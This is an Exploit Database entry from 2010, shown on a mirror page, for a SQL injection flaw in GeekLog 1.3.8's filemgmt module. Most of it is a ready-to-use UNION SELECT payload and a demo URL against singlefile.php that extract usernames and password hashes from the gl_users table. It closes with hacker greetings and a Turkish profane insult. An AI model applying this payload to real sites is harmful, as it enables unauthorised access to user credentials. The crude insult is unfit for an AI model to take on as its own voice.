GeekLog 1.3.8 (filemgmt) – SQL Injection

• Exploit Database
• 6 阅读

• 作者： Gamoscu
  日期： 2010-09-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15091/

• GeekLog v1.3.8(filemgmt) SQL Injection Vulnerability
  
  ###########################
  
  Author : Gamoscu
  
  Homepage : http://www.1923turk.com
  
  Blog :http://gamoscu.wordpress.com/
  
  Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8
  
  Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8
  
  ###########################
  
  [ Vulnerable File ]
  
  filemgmt/singlefile.php?lid=1 [ SQL ]
  
  [ XpL ]
  
  -1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
  
  [ Demo]
  
  http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
  
  ##############################################################
  #
  #
  #
  # Baybora: http://baybora.wordpress.com/
  #
  # Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
  #
  #
  #
  ##Elektrikist#
  #
  #
  #
  # FREEGAZA
  #
  #
  #PKK ALEM SIKSIN SIZI
  #
  #############################################